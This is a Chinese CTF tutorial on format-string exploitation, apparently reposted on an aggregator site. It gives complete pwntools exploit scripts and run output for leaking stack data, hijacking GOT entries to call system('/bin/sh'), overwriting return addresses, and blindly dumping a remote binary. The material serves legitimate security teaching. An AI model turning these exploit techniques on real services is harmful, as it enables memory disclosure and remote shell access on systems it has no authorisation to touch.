gef➤  fmtarg 0x00007fffffffdf78
The index of format argument : 10 ("\%9$p")

测试一下:

$ ./goodluck
what's the flag
%9$s
You answered:
flag{11111111111111111
But that was totally wrong lol get rekt

exp如下:

from pwn import *
from LibcSearcher import *
context.log_level = 'debug'
goodluck = ELF('./goodluck')
sh = process('./goodluck')
payload = "%9$s"
print (payload)
#gdb.attach(sh)
sh.sendline(payload)
print (sh.recv())
sh.interactive()

脚本运行结果:

$ python3 exp.py 
[*] '/mnt/d/study/ctf/资料/ctf-challenges/pwn/fmtstr/2017-UIUCTF-pwn200-GoodLuck/goodluck'Arch:     amd64-64-littleRELRO:    Partial RELROStack:    Canary foundNX:       NX enabledPIE:      No PIE (0x400000)
[+] Starting local process './goodluck' argv=[b'./goodluck'] : pid 32371
%9$s
[DEBUG] Sent 0x5 bytes:b'%9$s\n'
[DEBUG] Received 0x5d bytes:b"what's the flag\n"b'You answered:\n'b'flag{11111111111111111\n'b'But that was totally wrong lol get rekt\n'
b"what's the flag\nYou answered:\nflag{11111111111111111\nBut that was totally wrong lol get rekt\n"
[*] Switching to interactive mode
[*] Process './goodluck' stopped with exit code 0 (pid 32371)
[*] Got EOF while reading in interactive

2.2 hijack GOT

2.2.1 习题信息

习题来自:ctf-challenges/pwn/fmtstr/2016-CCTF-pwn3/pwn3

2.2.2 程序分析

checksec看一下安全机制:

$ checksec pwn3
[*] '/mnt/d/study/ctf/资料/ctf-challenges/pwn/fmtstr/2016-CCTF-pwn3/pwn3'Arch:     i386-32-littleRELRO:    Partial RELROStack:    No canary foundNX:       NX enabledPIE:      No PIE (0x8048000)

32位程序,只开了nx

IDA看一下流程:

看一下main函数,就是一个菜单,一开始先输入密码,然后校验,只有输入“rxraclhm”才能登录。而后功能分为put_file()、show_dir()、get_file()。

int __cdecl __noreturn main(int argc, const char **argv, const char **envp) {signed int v3;  // eaxint v4;         // [esp+14h] [ebp-2Ch]int v5;         // [esp+3Ch] [ebp-4h]setbuf(stdout, 0);ask_username((char *)&v4);  // 输入用户名ask_password((char *)&v4);  // 只有用户名是rxraclhm才能登录while (1) {while (1) {print_prompt();v3 = get_command();  // 输入命令v5 = v3;if (v3 != 2) break;put_file();  // 输入名字和内容}if (v3 == 3) {show_dir();} else {if (v3 != 1) exit(1);get_file();  // 按照文件名获取文件内容}}
}

看一下不同的功能函数,首先看一下put_file():

file *put_file()
{file *v0; // ST1C_4file *result; // eaxv0 = (file *)malloc(244u);printf("please enter the name of the file you want to upload:");// 输入名字和内容get_input((int)v0, 40, 1);printf("then, enter the content:");get_input((int)v0->content, 200, 1);v0->previous = file_head;                     // 尾插法result = v0;file_head = (int)v0;return result;
}

这个函数每次让输入一个name + content,组成一个结构体,头插法放入链表。

看一下get_file()函数:

int get_file()
{char dest; // [esp+1Ch] [ebp-FCh]char s1; // [esp+E4h] [ebp-34h]char *i; // [esp+10Ch] [ebp-Ch]printf("enter the file name you want to get:");__isoc99_scanf("%40s", &s1);if ( !strncmp(&s1, "flag", 4u) )puts("too young, too simple");for ( i = (char *)file_head; i; i = (char *)*((_DWORD *)i + 60) ){if ( !strcmp(i, &s1) )                      // 遍历,看是否找到需要的文件名{strcpy(&dest, i + 0x28);                  // 找到的话,把内容放在dest里面return printf(&dest);                     // 如果都没有找到,那就打印栈上的dest// 这里存在格式化字符串的漏洞}}return printf(&dest);
}

这个函数需要输入查找的文件的名字,然后返回它的内容。里面存在格式化字符串漏洞,同时,查找到的内容会存储在栈上变量dest内。因此,我们可以使用格式化字符串漏洞打印栈上任意内容,或者打印栈上存储的地址对应的内容(也就是进行1.3.2.1.2的利用)

再看一下show_dir():

int show_dir()
{int v0; // eaxchar s[1024]; // [esp+14h] [ebp-414h]int i; // [esp+414h] [ebp-14h]int j; // [esp+418h] [ebp-10h]int v5; // [esp+41Ch] [ebp-Ch]v5 = 0;j = 0;bzero(s, 0x400u);                             // 清空内容for ( i = file_head; i; i = *(_DWORD *)(i + 240) ){for ( j = 0; *(_BYTE *)(i + j); ++j ){v0 = v5++;s[v0] = *(_BYTE *)(i + j);                // 把文件名字都存放在s里面}}return puts(s);                               // 打印文件名字
}

这个函数会把所以存储的file的name连在一起打印出来,打印时使用puts()函数进行。

我们得到基本的思路:

  1. 泄露puts真实地址
  2. 利用puts真实地址在libc中查询到system()地址
  3. 替换puts()地址为system()地址
  4. 调用puts(),触发system(),获得shell

下面进行具体分析:

  1. 泄露puts真实地址

因为get_file()会根据name对content进行查找,然后把content放在栈上,利用printf()进行打印,且这里的printf()有格式化字符串漏洞。因此,我们可以首先利用put_file()把got[“puts”]作为content存储,然后get_file()寻找出来,再去算一下got[“puts”]在栈上的偏移,利用格式化字符串漏洞泄露出来。

我们用gdb看一下偏移:

我们在get_file()的printf打个断点:

 ► 0x804889e <get_file+168>     call   printf@plt <printf@plt>format: 0xffffcffc ◂— '%6$s0x804a028'vararg: 0x804b5d8 ◂— '%6$s0x804a028'0x80488a3 <get_file+173>     leave  0x80488a4 <get_file+174>     ret    0x80488a5 <get_command>      push   ebp0x80488a6 <get_command+1>    mov    ebp, esp0x80488a8 <get_command+3>    sub    esp, 0x28
────────────[ STACK ]──────────────
pwndbg> stack 20
00:0000│ esp     0xffffcfe0 —▸ 0xffffcffc ◂— '%6$s0x804a028'
01:0004│         0xffffcfe4 —▸ 0x804b5d8 ◂— '%6$s0x804a028'
02:0008│         0xffffcfe8 ◂— 0x4
03:000c│         0xffffcfec —▸ 0x804a080 (stdout@@GLIBC_2.0) —▸ 0xf7fb4d20 (_IO_2_1_stdout_) ◂— 0xfbad2887
04:0010│         0xffffcff0 —▸ 0xf7fb56f4 (__elf_set___libc_atexit_element__IO_cleanup__) —▸ 0xf7e48d00 (_IO_cleanup) ◂— endbr32 
05:0014│         0xffffcff4 ◂— 0x7d4
06:0018│         0xffffcff8 —▸ 0xf7fb4f20 (_IO_helper_jumps) ◂— 0x0
07:001c│ eax edx 0xffffcffc ◂— '%6$s0x804a028'
08:0020│         0xffffd000 ◂— '0x804a028'

可以看到0x804a028是在栈上偏移为9的位置,也就是格式化字符串的第8个参数,因此我们设置payload = %8$s[puts_got]

  1. 利用puts真实地址在libc中查询到system()地址

这个题目给了一个libc.so,但是因为我的环境是ubuntu20.04,无法使用,用了ldd发现是libc.so.6

$ ldd pwn3linux-gate.so.1 (0xf7f08000)libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xf7d02000)/lib/ld-linux.so.2 (0xf7f0a000)

因为没开pie,所以读取system()即可

  1. 替换puts()地址为system()地址

还是利用get_file()函数里面的格式化字符串漏洞,我们可以实现任意地址写,所以直接把puts_got处写入system()真实地址即可。

  1. 调用puts(),触发system(),获得shell

show_dir()函数可以利用puts()打印所有的name,但是因为我们已经用system()对puts()进行替换了,所以调用的就是system(),只需要把“/bin/sh”作为文件的name即可。

看一下exp:

#coding=utf-8
from pwn import *
from LibcSearcher import LibcSearcher
#context.log_level = 'debug'
pwn3 = ELF('./pwn3')
sh = process('./pwn3')def get(name):sh.sendline('get')sh.recvuntil('enter the file name you want to get:')sh.sendline(name)data = sh.recv()return datadef put(name, content):sh.sendline('put')sh.recvuntil('please enter the name of the file you want to upload:')sh.sendline(name)sh.recvuntil('then, enter the content:')sh.sendline(content)def show_dir():sh.sendline('dir')tmp = 'sysbdmin'
name = ""
for i in tmp:name += chr(ord(i) - 1)
print name# password
def password():sh.recvuntil('Name (ftp.hacker.server:Rainism):')sh.sendline(name)
# rxraclhm
# 0x804a028# password
password()# 1.利用get_file()泄露got地址
puts_got = pwn3.got['puts']
log.success('puts got : ' + hex(puts_got))
put('1111', '%8$s' + p32(puts_got))
puts_addr = u32(get('1111')[:4])
log.success('puts_addr: ' + hex(puts_addr))# 2.libc库中泄露system()函数地址
libc = ELF('/lib/i386-linux-gnu/libc.so.6')
libc.address = puts_addr - libc.symbols['puts']
system_addr = libc.symbols['system']
log.success('system addr : ' + hex(system_addr))# 3.将puts()篡改为system()
payload = fmtstr_payload(7, {puts_got: system_addr})
put('/bin/sh;', payload)
sh.recvuntil('ftp>')
sh.sendline('get')
sh.recvuntil('enter the file name you want to get:')
# gdb.attach(sh)
sh.sendline('/bin/sh;')# 4.执行show_dir()触发puts()函数,也就是执行system()函数
# system('/bin/sh')
show_dir()
sh.interactive()

python跑起来:

$ python2 exp.py 
[*] '/mnt/d/study/ctf/\xe8\xb5\x84\xe6\x96\x99/ctf-challenges/pwn/fmtstr/2016-CCTF-pwn3/pwn3'Arch:     i386-32-littleRELRO:    Partial RELROStack:    No canary foundNX:       NX enabledPIE:      No PIE (0x8048000)
[+] Starting local process './pwn3': pid 14458
rxraclhm
[+] puts got : 0x804a028
[+] puts_addr: 0xf7de8cd0
[*] '/lib/i386-linux-gnu/libc.so.6'Arch:     i386-32-littleRELRO:    Partial RELROStack:    Canary foundNX:       NX enabledPIE:      PIE enabled
[+] system addr : 0xf7dbc830
[*] Switching to interactive mode�                                                                                                                                                       \x04         

2.3 hijack retaddr

2.3.1 习题信息

习题来自:ctf-challenges/pwn/fmtstr/三个白帽-pwnme_k0

2.3.2 程序分析

checksec一下:

$ checksec pwnme_k0
[*] '/mnt/d/study/ctf/资料/ctf-challenges/pwn/fmtstr/三个白帽-pwnme_k0/pwnme_k0Arch:     amd64-64-littleRELRO:    Full RELROStack:    No canary foundNX:       NX enabledPIE:      No PIE (0x400000)

可以看到是64位程序,且relro全开,开启了nx

大概看一下程序的功能:

$ ./pwnme_k0
**********************************************
*                                            *
*Welcome to sangebaimao,Pwnn me and have fun!*
*                                            *
**********************************************
Register Account first!
Input your username(max lenth:20):
123
Input your password(max lenth:20):
123
Register Success!!
1.Sh0w Account Infomation!
2.Ed1t Account Inf0mation!
3.QUit sangebaimao:(
>1
Welc0me to sangebaimao!
123
123
1.Sh0w Account Infomation!
2.Ed1t Account Inf0mation!
3.QUit sangebaimao:(
>2
please input new username(max lenth:20):
456
please input new password(max lenth:20):
456
1.Sh0w Account Infomation!
2.Ed1t Account Inf0mation!
3.QUit sangebaimao:(
>1
Welc0me to sangebaimao!
456
456
1.Sh0w Account Infomation!
2.Ed1t Account Inf0mation!
3.QUit sangebaimao:(
>3
byebyeT.T

可以看到,程序一开始有个登录,让你输入一个账户密码。之后跳出程序的菜单,菜单有3个选项,打印信息/修改信息/退出程序。

用IDA看一下程序,发现打印用户信息的函数sub_400B07()存在格式化字符串漏洞:

int __fastcall sub_400B07(char format, __int64 a2, __int64 a3, __int64 a4, __int64 a5, __int64 a6, char formata, __int64 a8, __int64 a9)
{write(0, "Welc0me to sangebaimao!\n", 0x1AuLL);printf(&formata, "Welc0me to sangebaimao!\n");return printf((const char *)&a9 + 4);
}

最后一个语句,它打印a9+4,也就是前面存储的用户的密码,既然存在格式化字符串漏洞,那么就可以实现任意地址泄露和任意地址写。
继续IDA分析,看到字符串有:

.rodata:0000000000400F38	00000008	C	/bin/sh

进一步发现存在system("/bin/sh")

.text:00000000004008A6                               ; __unwind {
.text:00000000004008A6 55                            push    rbp
.text:00000000004008A7 48 89 E5                      mov     rbp, rsp
.text:00000000004008AA BF 38 0F 40 00                mov     edi, offset command   ; "/bin/sh"
.text:00000000004008AF E8 B4 FE FF FF                call    system
.text:00000000004008B4 5F                            pop     rdi
.text:00000000004008B5 5E                            pop     rsi
.text:00000000004008B6 5A                            pop     rdx
.text:00000000004008B7 C3                            retn

那么,可以得到思路,格式化字符串泄露ret地址,然后再格式化字符串对ret地址进行修改,让其执行system("/bin/sh"),从而得到shell。

我们用gdb分析一下printf执行时的栈帧,看一下如何去泄露ret地址。

gdb打开程序,设置用户名为123,密码为456,然后断点在格式化字符串的地方:

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-xDsUb8L3-1635518717264)(https://i.loli.net/2021/10/29/3oUun2HdtSNq47w.png)]

发现 ebp = 0x7fffffffe150, ret = 0x7fffffffe118

注意:0x7fffffffe150 表示的是当前栈的ebp,也就是调用 printf函数的那个栈的ebp。

ebp - ret = 0x7fffffffe150 - 0x7fffffffe118 = 0x38

也就是说,如果能够通过格式化字符串漏洞泄露出ebp,也就能够通过偏移得到ret的地址。之所以需要泄露ebp,是因为每次ebp都会变化。

得到ret的地址,再次通过格式化字符串漏洞修改ret为system的地址即可。

从上图我们可以看出来,ebp是在栈上第7个位置,也就是格式化字符串的第6个参数,所以payload设定为%6$p,然后减去0x38就能够得到ret。

同时,我们发现ret的前4个字节和system(00000000004008AA)的前4个字节相同,只需要修改ret的后4个字节即可。而用户名被写在了格式化字符串的第8个参数上,那么我们可以执行sub_400B41(),修改用户名为ret的地址,ret就会被写在格式化字符串的第8个参数上。然后触发格式化字符串漏洞,将这个位置的后4个字节修改为0x08AA即可,也就是修改为2218,所以输入payload=%2218d%8$hn

exp如下:

#coding=utf-8
from pwn import *
sh = process("./pwnme_k0")
binary = ELF("./pwnme_k0")
#gdb.attach(sh,'b *0x400b39')
sh.recv()
sh.sendline("1111")  # 第一次登陆的用户名
sh.recv()
sh.sendline("%6$p")  # 第一次登陆的密码,用来将rbp中的值泄露出来
sh.recv()
sh.sendline("1")  # 选择1操作执行打印用户信息进行泄露
sh.recvuntil("0x")
recv = sh.recvline()  # 获得rbp中的值
print "ebp addr" + str(recv)
ret_addr = int(recv, 16) - 0x38  # 计算ret返回地址所在内存地址
print "ret addr" + str(ret_addr)
sh.recv()
sh.sendline("2")  # 选择2操作执行用户信息修改操作
sh.recv()
sh.sendline(p64(ret_addr))  # 将ret返回地址所在内存地址写在用户名位置
sh.recv()
sh.sendline("%2218d%8$hn")  # 将覆盖操作写在用户密码位置,2218 = 0x8AA
sh.recv()
sh.sendline("1")  # 执行打印拿shell
sh.recv()
sh.interactive()

成功获取shell:

$ python2 exp.py
[+] Starting local process './pwnme_k0': pid 869
[*] '/mnt/d/study/ctf/\xe8\xb5\x84\xe6\x96\x99/ctf-challenges/pwn/fmtstr/\xe4\xb8\x89\xe4\xb8\xaa\xe7\x99\xbd\xe5\xb8\xbd-pwnme_k0/pwnme_k0'Arch:     amd64-64-littleRELRO:    Full RELROStack:    No canary foundNX:       NX enabledPIE:      No PIE (0x400000)
ebp addr7ffff6110920ret addr140737321699560
[*] Switching to interactive mode
$
[*] Interrupted
[*] Stopped process './pwnme_k0' (pid 869)

这里再介绍一种利用方式:

因为不仅是账户,密码也会被放在栈上,因此我们可以直接把需要覆盖的ret放在密码里面,然后看一下这个ret的偏移。

用户名123,密码:%2218d%12$n33333333

我们把还是看一下原来断点的地方的栈帧:

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-L6j1Dlzn-1635518717267)(https://i.loli.net/2021/10/29/p8hgQIdtP5UqBmD.png)]

发现填入的333333333在格式化字符串的第12个参数位置。因此,我们当我们把ret放在密码里面按照上述构造后,会恰好出现在格式化字符串的第12个参数位置,然后我们将其进行修改即可。

exp如下:

from pwn import *
elf = ELF('./pwnme_k0')
p = process('./pwnme_k0')
#gdb.attach(p,'b *0x400B39')
p.recvuntil('Input your username(max lenth:20):')
p.sendline('a'*8)
p.recvuntil('Input your password(max lenth:20):')
p.sendline('%6$p')
p.recvuntil('>')
p.sendline('1')
data = p.recvuntil('>')
data = data.split('\n')[1]
ret_addr = int(data, 16)-0x38
p.sendline('2')
p.recvuntil('please input new username(max lenth:20):')
p.sendline('b'*8)
p.recvuntil('please input new password(max lenth:20):')
payload = "%2218d%12$hn"
payload += p64(ret_addr)
print payload
# gdb.attach(p, 'b *0x400B39')
p.send(payload)
# gdb.attach()
p.recvuntil('>')
p.sendline('1')
p.interactive()

运行结果:

$ python2 exp2.py
[*] '/mnt/d/study/ctf/\xe8\xb5\x84\xe6\x96\x99/ctf-challenges/pwn/fmtstr/\xe4\xb8\x89\xe4\xb8\xaa\xe7\x99\xbd\xe5\xb8\xbd-pwnme_k0/pwnme_k0'Arch:     amd64-64-littleRELRO:    Full RELROStack:    No canary foundNX:       NX enabledPIE:      No PIE (0x400000)
[+] Starting local process './pwnme_k0': pid 1001
%2218d%12$hn\xa8w���\x00
[*] Switching to interactive mode
bbbbbbbb
\x17��\x7f$

2.4 堆上的格式化字符串漏洞

嘎嘎嘎鸽鸽鸽

2.5 格式化字符串盲打

2.5.1 泄露栈

2.5.1.1 习题信息

习题来自:ctf-challenges/pwn/fmtstr/blind_fmt_got

2.5.1.2 程序分析

先把程序用脚本挂在端口上:

$ ./deploy.sh 

然后连接下程序进行测试:

$ nc localhost 9999
%p
0x7ffde48bcbd0
�dflag is on the stack

输入%p,发现返回一个0x7ffde48bcbd0,8字节,那么程序就是64位,且猜测存在格式化字符串漏洞(这个地址应该是来自于栈上的地址)

那么我们就可以使用如下的脚本把栈上的内容泄露出来:

from pwn import *
context.log_level = 'error'def leak(payload):sh = remote('127.0.0.1', 9999)sh.sendline(payload)data = sh.recvuntil('\n', drop=True)if data.startswith('0x'):print p64(int(data, 16))sh.close()i = 1
while 1:payload = '%{}$p'.format(i)leak(payload)i += 1

运行结果:

\x00\x00\x00\x00
flag{thi
s_is_fla
g}\x00\x00\x00
\x00\x00�

可以看到栈上内容被逐渐打印出来,其中就包含flag

上面的程序源码为:

// gcc -fno-stack-protector main.c -o blind
#include <stdio.h>
int main() {char flag[100] = "flag{this_is_flag}";char input[512];read(0, input, 512);printf(input);printf("flag is on the stack");return 0;
}

2.5.2 盲打劫持got

关于2.5.2的内容主要参考ctf-wiki,有些地方代码没有跑通,但是为了知识点完整性和系统性,搬运了一些ctf-wiki的内容。

2.5.2.1 习题信息

习题来自:ctf-challenges/pwn/fmtstr/blind_fmt_got

2.5.2.2 程序分析

也是一样先挂到999端口:

$ ./deploy.sh 

然后连接:

$ nc localhost 9999
%p
0x7ffc6aa36630

可以看出来是64位程序,但是没有其他的回显信息,猜测也是存在格式化字符串漏洞。

那么就把整个二进制文件给泄露出来,脚本如下:

##coding=utf8
from pwn import *##context.log_level = 'debug'
ip = "127.0.0.1"
port = 9999def leak(addr):# leak addr for three timesnum = 0while num < 3:try:print 'leak addr: ' + hex(addr)sh = remote(ip, port)payload = '%00008$s' + 'STARTEND' + p64(addr)# 说明有\n,出现新的一行if '\x0a' in payload:return Nonesh.sendline(payload)data = sh.recvuntil('STARTEND', drop=True)sh.close()return dataexcept Exception:num += 1continuereturn Nonedef getbinary():addr = 0x400000f = open('binary', 'w')while addr < 0x401000:data = leak(addr)if data is None:f.write('\xff')addr += 1elif len(data) == 0:f.write('\x00')addr += 1else:f.write(data)addr += len(data)f.close()
getbinary()

需要注意的是,在 payload 中需要判断是否有 ‘\n’ 出现,因为这样会导致源程序只读取前面的内容,而没有办法泄露内存,所以需要跳过这样的地址。

得到二进制文件binary,然后IDA打开:

seg000:00000000004005F6                 push    rbp
seg000:00000000004005F7                 mov     rbp, rsp
seg000:00000000004005FA                 add     rsp, 0FFFFFFFFFFFFFF80h
seg000:00000000004005FE
seg000:00000000004005FE loc_4005FE:                             ; CODE XREF: seg000:0000000000400639j
seg000:00000000004005FE                 lea     rax, [rbp-80h]
seg000:0000000000400602                 mov     edx, 80h ; '€'
seg000:0000000000400607                 mov     rsi, rax
seg000:000000000040060A                 mov     edi, 0
seg000:000000000040060F                 mov     eax, 0
seg000:0000000000400614                 call    sub_4004C0
seg000:0000000000400619                 lea     rax, [rbp-80h]
seg000:000000000040061D                 mov     rdi, rax
seg000:0000000000400620                 mov     eax, 0
seg000:0000000000400625                 call    sub_4004B0
seg000:000000000040062A                 mov     rax, cs:601048h
seg000:0000000000400631                 mov     rdi, rax
seg000:0000000000400634                 call    near ptr unk_4004E0
seg000:0000000000400639                 jmp     short loc_4005FE

可以基本确定的是 sub_4004C0 为 read 函数,因为读入函数一共有三个参数的话,基本就是 read 了。此外,下面调用的 sub_4004B0 应该就是输出函数了,再之后应该又调用了一个函数,此后又重新跳到读入函数处,那程序应该是一个 while 1 的循环,一直在执行。

那么,我们大概就搞明白了程序的执行流程,也就是一个read函数向buf内读入数据,然后再调用一个有格式化字符串漏洞的printf打印buf。

我们可以利用之前hijack got的技巧,将printf替换为system,然后再次触发read和printf,这一次传入的参数为"/bin/sh",来获取shell。但是因为不知道system()地址,那就是ret2libc的思路,首先泄露一下printf的地址(这个直接使用格式化字符串漏洞,打印出printf_got),然后和libc[“printf”]做个差,得到libc的基地址。之后就能得到system()的地址了。

整个exp如下:

##coding=utf8
import math
from pwn import *
from LibcSearcher import LibcSearcher
##context.log_level = 'debug'
context.arch = 'amd64'
ip = "127.0.0.1"
port = 9999def leak(addr):# leak addr for three timesnum = 0while num < 3:try:print 'leak addr: ' + hex(addr)sh = remote(ip, port)payload = '%00008$s' + 'STARTEND' + p64(addr)# 说明有\n,出现新的一行if '\x0a' in payload:return Nonesh.sendline(payload)data = sh.recvuntil('STARTEND', drop=True)sh.close()return dataexcept Exception:num += 1continuereturn Nonedef getbinary():addr = 0x400000f = open('binary', 'w')while addr < 0x401000:data = leak(addr)if data is None:f.write('\xff')addr += 1elif len(data) == 0:f.write('\x00')addr += 1else:f.write(data)addr += len(data)f.close()##getbinary()
read_got = 0x601020
printf_got = 0x601018
sh = remote(ip, port)
## let the read get resolved
sh.sendline('a')
sh.recv()
## get printf addr
payload = '%00008$s' + 'STARTEND' + p64(read_got)
sh.sendline(payload)
data = sh.recvuntil('STARTEND', drop=True).ljust(8, '\x00')
sh.recv()
read_addr = u64(data)## get system addr
libc = LibcSearcher('read', read_addr)
libc_base = read_addr - libc.dump('read')
system_addr = libc_base + libc.dump('system')
log.success('system addr: ' + hex(system_addr))
log.success('read   addr: ' + hex(read_addr))
## modify printf_got
payload = fmtstr_payload(6, {printf_got: system_addr}, 0, write_size='short')
## get all the addr
addr = payload[:32]
payload = '%32d' + payload[32:]
offset = (int)(math.ceil(len(payload) / 8.0) + 1)
for i in range(6, 10):old = '%{}$'.format(i)new = '%{}$'.format(offset + i)payload = payload.replace(old, new)
remainer = len(payload) % 8
payload += (8 - remainer) * 'a'
payload += addr
sh.sendline(payload)
sh.recv()## get shell
sh.sendline('/bin/sh;')
sh.interactive()

前面都很好理解,重点看一下这段代码:

## modify printf_got
payload = fmtstr_payload(6, {printf_got: system_addr}, 0, write_size='short')
## get all the addr
addr = payload[:32]
payload = '%32d' + payload[32:]
offset = (int)(math.ceil(len(payload) / 8.0) + 1)
for i in range(6, 10):old = '%{}$'.format(i)new = '%{}$'.format(offset + i)payload = payload.replace(old, new)
remainer = len(payload) % 8
payload += (8 - remainer) * 'a'
payload += addr
sh.sendline(payload)
sh.recv()

fmtstr_payload 直接得到的 payload 会将地址放在前面,而这个会导致 printf 的时候 ‘\x00’ 截断(关于这一问题,pwntools 目前正在开发 fmt_payload 的加强版,估计快开发出来了。)。所以使用了一些技巧将它放在后面了。主要的思想是,将地址放在后面 8 字节对齐的地方,并对 payload 中的偏移进行修改。需要注意的是

offset = (int)(math.ceil(len(payload) / 8.0) + 1)

这一行给出了修改后的地址在格式化字符串中的偏移,之所以是这样在于无论如何修改,由于 ‘%order$hn’ 中 order 多出来的字符都不会大于 8。具体的可以自行推导。

参考:

https://ctf-wiki.org/pwn/linux/user-mode/fmtstr/fmtstr-example/#_35

https://blog.csdn.net/qq_41202237/article/details/107833668

https://blog.csdn.net/qq_41202237/article/details/107662273

查看全文
如若内容造成侵权/违法违规/事实不符,请联系编程学习网邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!

相关文章

  1. ruoyi(若依)改为mybatis-plus

    若依mybatis升级为mybatis-plus -- activiti工作流养成计划&#xff08;二&#xff09; - 简书 1.在根目录、common、system下都添加上以下依赖。原来的mabatis注释掉 <dependency><groupId>com.baomidou</groupId><artifactId>mybatis-plus-boot-sta…...

    2024/5/5 12:43:29
  2. 21天养成良好习惯:第七天

    数据库系统集合查询训练 查询只选修了‘信息系统’和‘数学’这两门课程的学生的基本信息 select student.* from student where sno in(select snofrom scwhere cno(select cnofrom coursewhere cname信息系统) ) intersect select student.* from student where sno in(se…...

    2024/5/5 4:05:00
  3. java 复习

    redis内容&#xff1b; 分布式锁之Redis实现 - 简书 分布式锁 https://segmentfault.com/a/1190000019713901 限流 一文带你全面了解限流算法 - DockOne.io 集合 hash-map spi spring bean 初始化流程 多线程 线程的状态转换以及基本操作 - 简书 jvm 基础 synchro…...

    2024/5/2 20:12:59
  4. 2021年最新版消费者运营咨询顾问认证题库

    2021年最新版消费者运营咨询顾问认证题库 作为做运营喵的你是否还在为拿不到阿里认证证书烦恼呢&#xff1f;小编而为你排忧解难,亲手试水的呕心整理的题库奉上, 答案连续用户名&#xff0c;愿小伙伴们都能顺利拿到证书~~升职加薪,走向人生高峰! 在品牌全域数字化增长方案流程…...

    2024/5/2 20:12:56
  5. 找字符串中出现次数最多的字符

    文章目录一、题目二、代码一、题目 题目描述 小蓝正在学习一门神奇的语言&#xff0c;这门语言中的单词都是由小写英文字母组 成&#xff0c;有些单词很长&#xff0c;远远超过正常英文单词的长度。小蓝学了很长时间也记不住一些单词&#xff0c;他准备不再完全记忆这些单词&…...

    2024/5/5 9:52:37
  6. MySQL安装与完全卸载

    下载安装建议&#xff1a; 1、建议版本5.7&#xff0c;稳定 2、尽量不要使用exe安装&#xff0c;注册表清理问题 3、尽可能使用压缩包安装 安装MySQl 1、解压 2、添加环境变量 3、新建MySQl配置文件my.ini [mysqld] #设置3306端口号 port3306 #设置MySQL的安装目录,(这是我…...

    2024/5/2 20:12:47
  7. Linux:进程概念和进程控制(未完成)

    kill命令对僵尸进程没用. 孤儿进程不占据当前程序运行的会话,在后台运行(当前会话能打指令) 1号进程(init)是负责任的进程,所以孤儿进程退出不会成为僵尸进程,可以被kill掉 孤儿进程设置了自己的会话空间后成为守护进程(精灵进程),会话空间是问号"?",脱离了终端运…...

    2024/5/2 20:12:43
  8. pytorch对网络中部分层参数的提取用到另一个网络

    对网络模型的保存文件.pth的直观理解 是一个包含多个键值对的集合&#xff08;set&#xff09; 参数抽取的操作根本&#xff0c;就是对“相似”键值对的提取 解释一下相似&#xff0c;因为模型在使用中可能变了名称&#xff0c;所以键值可能按照相同的规律同时变化&#xff…...

    2024/5/2 20:12:39
  9. Java面试题手册

    给我冲&#xff01;第一节1.面向对象1.1封装1.2继承1.3多态第一节 1.面向对象 对比面向过程是两种不同的处理问题的角度面向过程更注重事情的每一个步骤以及顺序面向对象更注重有哪些参与者以及参与者各自干什么事比如使用洗衣机洗衣服面向过程的思想&#xff1a;打开洗衣机-…...

    2024/5/2 20:12:35
  10. leetcode 21天打卡 3 路径交叉

    要求&#xff1a; 给你一个整数数组 distance 。 从 X-Y 平面上的点 (0,0) 开始&#xff0c;先向北移动 distance[0] 米&#xff0c;然后向西移动 distance[1] 米&#xff0c;向南移动 distance[2] 米&#xff0c;向东移动 distance[3] 米&#xff0c;持续移动。也就是说&…...

    2024/5/5 5:17:18
  11. 微信、抖音红包设计测试用例-----必背

    功能测试 兼容测试 性能测试 界面测试 安全测试 页面测试...

    2024/5/2 19:37:53
  12. Word VBA绘制图形-1

    非计算机科班出身人士,仅仅是喜欢喜欢Word VBA代码;同时,也是一位10年的MS Office疯狂热爱者。后续不定期更新该系列博客,希望我能坚持不断学习。 今天是周日,在家躺着也是躺着,就跑到网上瞎逛。我每天会从油管上找些视频资源下载下来。但是不能下载太多,怕被学校或者油…...

    2024/5/5 6:58:00
  13. 2.迁移wsl2子系统文件目录

    1. wsl2文件说明 wsl2中磁盘文件默认位于 \Users\<User Name>\AppData\Local\Packages\ 目录下 如安装的Linux子系统为Ubuntu&#xff0c;则可以看到包含Ubuntu单词的文件夹 在该目录下的 LocalState 目录中&#xff0c;可以看到 ext4.vhdx 文件 在wsl2中&#xff0c;是…...

    2024/5/2 20:12:24
  14. jvm运行时内存

    jdk7中的内存结构 jdk8中的内存结构 线程私有的:程序计数器&#xff0c;虚拟机栈&#xff0c;本地方法栈 线程共享的&#xff1a;堆&#xff0c;方法区&#xff0c;元空间&#xff0c;直接内存 java8之后方法区的变化&#xff1a;元空间替换永久代&#xff0c;永久代中的类…...

    2024/5/2 20:12:20
  15. 谷歌大幅削减其应用商店服务费

    Google近日表示&#xff0c;在苹果采取类似举措后&#xff0c;Google 将降低其应用商店的服务费。因为两家公司都面临立法者和监管机构的压力&#xff0c;要求开发者更容易访问其应用商店。 Google 在一份新闻稿中表示&#xff0c;Google Play 商店的订阅服务费将从 30% 降至 1…...

    2024/5/2 3:45:12
  16. HDFS读数据流

    1.客户端通过函数读取它需要的数据 2.Distributed File System通过RPC协议调用名称节点确定文件的位置 3.客户端利用FSDataInputStream的Read&#xff08;&#xff09;开始读数据 4.FSD保存文件的第一个数据块的最近的数据节点&#xff0c;以数据流的形式读取数据&#xff0…...

    2024/5/2 20:12:12
  17. 【行业资料】文化赋能旅游,旅游振兴乡村——附下载链接

    中国旅游研究院监测数据显示, 2021上半年国内旅游经济运行综合指数(CTA-TEP )稳步回升到106.05 ,同比和环比分别上升了33.73%和24.16% ,正在步入从"相对景气"到"景气"通道。聚焦乡村领域,课题组开展的2021上半年乡村游企业专项调研(以下简称"企业调研…...

    2024/5/2 20:12:07
  18. VS Code 远程连接Linux开发C/C++ 引入头文件出错解决办法

    项目场景&#xff1a; VS Code 远程连接Centos等Linux环境&#xff0c;在VS code 编辑器内开发调试C/C代码。 问题描述&#xff1a; VS Code通过 ssh 插件远程连接 Centos转到其文件系统下&#xff0c;并在VS Code编辑器内开发调试C/C&#xff0c;发现导入头文件时报错。 原因…...

    2024/5/2 20:12:04
  19. 使用 wireshark 分析 TCP 通信流程

